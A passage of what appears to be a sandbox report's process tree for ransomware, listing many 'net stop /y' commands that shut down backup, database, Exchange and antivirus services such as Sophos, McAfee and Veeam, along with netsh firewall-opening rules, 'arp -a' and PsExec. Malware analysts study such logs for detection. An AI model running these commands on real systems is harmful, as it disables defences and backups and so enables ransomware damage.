  PID:6180
- C:\Windows\system32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:8248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:12108
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:10028
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:11956
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:10008
- C:\Windows\system32\net.exe
  "net.exe" stop SstpSvc /y
  2⤵
  PID:10152
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SstpSvc /y
    3⤵
    PID:1804
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:10624
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3⤵
    PID:10412
- C:\Windows\system32\net.exe
  "net.exe" stop “Zoolz 2 Service” /y
  2⤵
  PID:1760
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
    3⤵
    PID:10976
- C:\Windows\system32\net.exe
  "net.exe" stop OracleClientCache80 /y
  2⤵
  PID:7964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop OracleClientCache80 /y
    3⤵
    PID:8948
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeMTA /y
  2⤵
  PID:10216
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeMTA /y
    3⤵
    PID:10856
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:8880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPS /y
    3⤵
    PID:6740
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:8848
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:10780
- C:\Windows\system32\net.exe
  "net.exe" stop mfemms /y
  2⤵
  PID:16356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfemms /y
    3⤵
    PID:13080
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Device Control Service” /y
  2⤵
  PID:9876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
    3⤵
    PID:4832
- C:\Windows\system32\net.exe
  "net.exe" stop SepMasterService /y
  2⤵
  PID:2152
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SepMasterService /y
    3⤵
    PID:7636
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:14208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:14576
- C:\Windows\system32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:15516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:14772
- C:\Windows\system32\net.exe
  "net.exe" stop msexchangeadtopology /y
  2⤵
  PID:8272
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeadtopology /y
    3⤵
    PID:12680
- C:\Windows\system32\net.exe
  "net.exe" stop RESvc /y
  2⤵
  PID:16508
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RESvc /y
    3⤵
    PID:588
- C:\Windows\system32\net.exe
  "net.exe" stop ShMonitor /y
  2⤵
  PID:13900
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ShMonitor /y
    3⤵
    PID:5712
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos MCS Agent” /y
  2⤵
  PID:13108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
    3⤵
    PID:6096
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:14672
- C:\Windows\system32\net.exe
  "net.exe" stop mfevtp /y
  2⤵
  PID:5404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfevtp /y
    3⤵
    PID:11308
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:5724
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:10480
- C:\Windows\system32\net.exe
  "net.exe" stop UI0Detect /y
  2⤵
  PID:6240
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop UI0Detect /y
    3⤵
    PID:752
- C:\Windows\system32\net.exe
  "net.exe" stop “Symantec System Recovery” /y
  2⤵
  PID:8796
- C:\Windows\system32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:5148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:7440
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:10424
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROD /y
    3⤵
    PID:15544
- C:\Windows\system32\net.exe
  "net.exe" stop sms_site_sql_backup /y
  2⤵
  PID:8780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sms_site_sql_backup /y
    3⤵
    PID:7056
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeSA /y
  2⤵
  PID:11488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSA /y
    3⤵
    PID:14804
- C:\Windows\system32\net.exe
  "net.exe" stop Smcinst /y
  2⤵
  PID:16684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Smcinst /y
    3⤵
    PID:12096
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:15724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
    3⤵
    PID:14232
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:16372
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos File Scanner Service” /y
  2⤵
  PID:16224
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
    3⤵
    PID:17920
- C:\Windows\system32\net.exe
  "net.exe" stop “intel(r) proset monitoring service” /y
  2⤵
  PID:16552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
    3⤵
    PID:13908
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$TPS /y
  2⤵
  PID:10236
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPS /y
    3⤵
    PID:17940
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:10708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:12164
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:12216
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
    3⤵
    PID:18092
- C:\Windows\system32\net.exe
  "net.exe" stop “Veeam Backup Catalog Data Service” /y
  2⤵
  PID:12200
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:13928
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:10660
- C:\Windows\system32\net.exe
  "net.exe" stop SmcService /y
  2⤵
  PID:17928
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SmcService /y
    3⤵
    PID:7104
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:17988
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:13936
- C:\Windows\system32\net.exe
  "net.exe" stop msexchangeimap4 /y
  2⤵
  PID:16556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeimap4 /y
    3⤵
    PID:10732
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:12160
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:18136
- C:\Windows\system32\net.exe
  "net.exe" stop sacsvr /y
  2⤵
  PID:18184
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sacsvr /y
    3⤵
    PID:11112
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:10264
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:11460
- C:\Windows\system32\net.exe
  "net.exe" stop W3Svc /y
  2⤵
  PID:10580
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop W3Svc /y
    3⤵
    PID:11436
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos MCS Client” /y
  2⤵
  PID:12280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Client” /y
    3⤵
    PID:5716
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:11508
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CXDB /y
    3⤵
    PID:4940
- C:\Windows\system32\net.exe
  "net.exe" stop ARSM /y
  2⤵
  PID:18228
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ARSM /y
    3⤵
    PID:11784
- C:\Windows\system32\net.exe
  "net.exe" stop SntpService /y
  2⤵
  PID:12352
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SntpService /y
    3⤵
    PID:5200
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeSRS /y
  2⤵
  PID:10656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSRS /y
    3⤵
    PID:11580
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:11120
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:14492
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Health Service” /y
  2⤵
  PID:10588
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Health Service” /y
    3⤵
    PID:12120
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:10604
- C:\Windows\system32\net.exe
  "net.exe" stop sophossps /y
  2⤵
  PID:12716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophossps /y
    3⤵
    PID:18396
- C:\Windows\system32\net.exe
  "net.exe" stop SAVService /y
  2⤵
  PID:13868
- C:\Windows\system32\net.exe
  "net.exe" stop unistoresvc_1af40a /y
  2⤵
  PID:5536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop unistoresvc_1af40a /y
    3⤵
    PID:12440
- C:\Windows\system32\net.exe
  "net.exe" stop audioendpointbuilder /y
  2⤵
  PID:11720
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop audioendpointbuilder /y
    3⤵
    PID:11736
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:12744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
    3⤵
    PID:11660
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Message Router” /y
  2⤵
  PID:15468
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Message Router” /y
    3⤵
    PID:16120
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:12672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:12924
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Safestore Service” /y
  2⤵
  PID:4936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
    3⤵
    PID:12748
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:14496
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:18308
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
    3⤵
    PID:11648
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:12980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:10988
- C:\Windows\system32\net.exe
  "net.exe" stop swi_filter /y
  2⤵
  PID:12732
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_filter /y
    3⤵
    PID:11564
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /
  2⤵
  PID:13072
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:13120
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:16328
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:16668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:13164
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:1764
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
    3⤵
    PID:5112
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:12296
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPS /y
    3⤵
    PID:8564
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:13880
- C:\Windows\system32\net.exe
  "net.exe" stop svcGenericHost /y
  2⤵
  PID:12176
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop svcGenericHost /y
    3⤵
    PID:18336
- C:\Windows\system32\net.exe
  "net.exe" stop AVP /y
  2⤵
  PID:11808
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AVP /y
    3⤵
    PID:14548
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos System Protection Service” /y
  2⤵
  PID:17016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
    3⤵
    PID:12340
- C:\Windows\system32\net.exe
  "net.exe" stop swi_service /y
  2⤵
  PID:12372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_service /y
    3⤵
    PID:4868
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:17028
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
    3⤵
    PID:3404
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:17048
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:4308
- C:\Windows\system32\net.exe
  "net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:15680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY /y
    3⤵
    PID:4396
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:17120
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
    3⤵
    PID:17084
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:2644
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
    3⤵
    PID:15596
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:3856
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:16900
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:5328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
    3⤵
    PID:4204
- C:\Windows\system32\net.exe
  "net.exe" stop swi_update /y
  2⤵
  PID:4724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update /y
    3⤵
    PID:4576
- C:\Windows\system32\net.exe
  "net.exe" stop DCAgent /y
  2⤵
  PID:3240
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DCAgent /y
    3⤵
    PID:4148
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Web Control Service” /y
  2⤵
  PID:5060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
    3⤵
    PID:6568
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:3836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:4376
- C:\Windows\system32\net.exe
  "net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:1820
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:4360
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:4056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:17160
- C:\Windows\system32\net.exe
  "net.exe" stop swi_update_64 /y
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2072
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update_64 /y
    3⤵
    PID:16824
- C:\Windows\system32\net.exe
  "net.exe" stop WRSVC /y
  2⤵
  PID:2240
- C:\Windows\system32\net.exe
  "net.exe" stop mssql$vim_sqlexp /y
  2⤵
  PID:13112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
    3⤵
    PID:4704
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PROD /y
  2⤵
  PID:4192
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROD /y
    3⤵
    PID:4232
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:4856
- C:\Windows\system32\net.exe
  "net.exe" stop vapiendpoint /y
  2⤵
  PID:15688
- C:\Windows\system32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:5540

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:7956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
1⤵
PID:5196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:5100

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RESvc /y
1⤵
PID:3832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
1⤵
PID:5092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
1⤵
PID:10392

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
1⤵
PID:3908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
1⤵
PID:5368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
1⤵
PID:16272

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
1⤵
PID:16264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
1⤵
PID:16256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
1⤵
PID:16248

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
1⤵
PID:16240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
1⤵
PID:16232

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
1⤵
PID:16216

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
1⤵
PID:16164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:16156

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
1⤵
PID:16148

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfemms /y
1⤵
PID:16140

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
1⤵
PID:16076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
1⤵
PID:16060

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
1⤵
PID:16052

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
1⤵
PID:16044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:16036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
1⤵
PID:16020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
1⤵
PID:16004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
1⤵
PID:15996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:15980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
1⤵
PID:15972

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
1⤵
PID:15964

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:15956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
1⤵
PID:15948

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
1⤵
PID:15940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
1⤵
PID:15928

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:15924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
1⤵
PID:15916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
1⤵
PID:15908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
1⤵
PID:15900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
1⤵
PID:15892

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
1⤵
PID:15884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
1⤵
PID:15876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
1⤵
PID:15868

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:15860
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop VeeamTransportSvc /y
  2⤵
  PID:7540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
1⤵
PID:15852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:15844

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
1⤵
PID:15836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:15828

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
1⤵
PID:15820

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
1⤵
PID:15812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
1⤵
PID:15804

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
1⤵
PID:15796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:15788

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
1⤵
PID:15780

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
1⤵
PID:15772

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McShield /y
1⤵
PID:15764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ARSM /y
1⤵
PID:15756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:15748

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SamSs /y
1⤵
PID:15740

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
1⤵
PID:15732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
1⤵
PID:15724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
1⤵
PID:15716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
1⤵
PID:15700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:15692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SntpService /y
1⤵
PID:15684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
1⤵
PID:15676

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
1⤵
PID:15668

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
1⤵
PID:15660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
1⤵
PID:15652

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop masvc /y
1⤵
PID:15644

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
1⤵
PID:15636

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
1⤵
PID:15628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
1⤵
PID:15620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
1⤵
PID:15604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
1⤵
PID:15608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
1⤵
PID:15592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:15588

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
1⤵
PID:15572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
1⤵
PID:15580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
1⤵
PID:15564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
1⤵
PID:15556

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ekrn /y
1⤵
PID:15544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
1⤵
PID:15536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
1⤵
PID:15384

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:15376

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
1⤵
PID:15368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
1⤵
PID:5972

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
1⤵
PID:6060

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
1⤵
PID:4980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
1⤵
PID:5956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
1⤵
PID:5880

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
1⤵
PID:5260

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
1⤵
PID:15356

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:15348

C:\Windows\system32\net1.exe
